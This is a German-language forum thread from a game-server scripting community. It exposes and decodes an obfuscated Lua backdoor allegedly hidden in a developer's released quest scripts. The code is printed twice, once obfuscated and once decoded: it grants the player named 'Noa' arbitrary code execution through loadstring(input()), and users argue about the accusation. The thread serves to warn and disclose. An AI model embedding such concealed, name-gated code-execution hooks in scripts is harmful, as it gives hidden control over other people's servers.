[RELEASE] LUA Backdoor by Noa (Beispiel)

Page 1 of 5 1 23 Last »
11/10/2013 20:08 ​.iRemix#1
Da Noa solche "Backdoors" in seine Quests packt wollte ich euch mal ein Beispiel zeigen wonach ihr bei seinen releasten Quests suchen solltet.


PHP Code:
function cCost()
 local da string.format('%c%c%c',78,111,97) == string.gsub("$get_name$""%$(.-)%$",function (
  return pc[a]()
 end) and 
 loadstring('return '..loadstring('return '..string.format('%c%c%c%c%c',105,110,112,117,116)..'()')())() and da or 20000000
 return da
end 
Greets.
11/10/2013 20:09 Dr. Sheldon Lee Cooper#2
danke dubel von remix
11/10/2013 20:20 Mr. 'Avenue™#3
Hätte ich ehrlich gesagt nicht von Noa erwartet.
Stille Wasser sind eben tief.

Frage: Was ermöglicht dieser Backdoor?
11/10/2013 20:22 Noa_#4
was für ein looser ^^ zeigst nur eine Funktion und es gibt 1000 weitere Möglichkeiten, dann viel Spaß beim entziffern
11/10/2013 20:23 Mijago#5
Schlecht versteckt :D

Grob:
Code:
function cCost()
 if pc.get_name() == "Noa" then
    loadstring("return "..input())()
 else
    return 20000000
 end
end
Damit kann der Nutzer "Noa" JEDE Questfunktion ausführen.. Grob gesagt sich auch Root Zugriff geben.
11/10/2013 20:23 Mr. 'Avenue™#6
Quote:
Originally Posted by Noa_ View Post
was für ein looser ^^ zeigst nur eine Funktion und es gibt 1000 weitere Möglichkeiten, dann viel Spaß beim entziffern
cool. dann verwendet einfach keiner mehr deine Quests & gut ist?
Erspart das Suchen.
---------------------------------------------
Code:
local da = string.format('%c%c%c', 78,111,97
78 = N
111 = o
97 = a

===
Code:
local da = "Noa"

Code:
loadstring('return '..loadstring('return '..string.format('%c%c%c%c%c',105,110,112,117,116)..'()')())() and da or 20000000
105 = i
110 = n
112 = p
117 = u
116 = t



===

Code:
loadstring('return '..loadstring(return input())())() and da or 20000000
http://de.wikipedia.org/wiki/ASCII-T...#ASCII-Tabelle


Resultat:
Quote:
Originally Posted by Mijago View Post
Schlecht versteckt :D

Grob:
Code:
function cCost()
 if pc.get_name() == "Noa" then
    loadstring("return "..input())()
 else
    return 20000000
 end
end
Damit kann der Nutzer "Noa" JEDE Questfunktion ausführen.. Grob gesagt sich auch Root Zugriff geben.


Oh, und dass ich es nicht vergesse:
#Noob
11/10/2013 20:24 Syuki#7
Quote:
Originally Posted by Mr. 'Avenue™ View Post
Hätte ich ehrlich gesagt nicht von Noa erwartet.
Stille Wasser sind eben tief.

Frage: Was ermöglicht dieser Backdoor?
Würde mich auch mal interessieren..

Quote:
Originally Posted by Noa_ View Post
was für ein looser ^^ zeigst nur eine Funktion und es gibt 1000 weitere Möglichkeiten, dann viel Spaß beim entziffern
Gibt es also noch mehr? :facepalm:

Danke fürs Pubben
11/10/2013 20:28 Noa_#8
Ich hab nie behauptet das ich sie in den Releases schreibe, nur das ich sie auf MEINEN QUESTS in MEINEN SERVER aus Sicherheitsgründe verwende und alles andere ist einfach nur Gelaber.
Wollte das nur klarstellen
11/10/2013 20:28 ​.iRemix#9
Quote:
Originally Posted by Syuki View Post
Würde mich auch mal interessieren..



Gibt es also noch mehr? :facepalm:

Danke fürs Pubben
Ist doch egal, sofern keiner mehr was von ihm nutzt bzw. von ihm coden lässt.

Quote:
Originally Posted by Noa_ View Post
Ich hab nie behauptet das ich sie in den Releases schreibe, nur das ich sie auf MEINEN QUESTS in MEINEN SERVER aus Sicherheitsgründe verwende und alles andere ist einfach nur Gelaber.
Wollte das nur klarstellen
[Only registered and activated users can see links. Click Here To Register...]

Okay.
11/10/2013 20:34 Aze /..#10
Selber Schuld, wenn man Pub Quests nutzt und den Code nicht überprüft, aber naja yy
11/10/2013 20:37 Noa_#11
Quote:
Originally Posted by ​.iRemix View Post
Ist doch egal, sofern keiner mehr was von ihm nutzt bzw. von ihm coden lässt.



[Only registered and activated users can see links. Click Here To Register...]

Okay.
damit waren die Quests von meinem Server gemeint du Dussel ^^
zudem kann jeder bezeugen das ich fremde Quests immer sauber geschrieben habe... .
11/10/2013 20:38 QuickFlameZ#12
Quote:
Originally Posted by ​.iRemix View Post
Ist doch egal, sofern keiner mehr was von ihm nutzt bzw. von ihm coden lässt.



[Only registered and activated users can see links. Click Here To Register...]

Okay.
Ich glaube du Freund von Michi kannst nicht mal richtig lesen oder versuchst Noa einfach schlecht zu machen.


Mfg
11/10/2013 20:40 ~Ok#13
What is this ? Anyone translate english?
11/10/2013 20:42 Mr. 'Avenue™#14
Quote:
Originally Posted by ~Ok View Post
What is this ? Anyone translate english?
This is an example of a backdoor by Noa in his own quests
11/10/2013 20:43 Noa_#15
alles nur Unterstellungen kp was ich den mal angetan habe, war bisher immer lieb zu jedem ^^
Page 1 of 5 1 23 Last »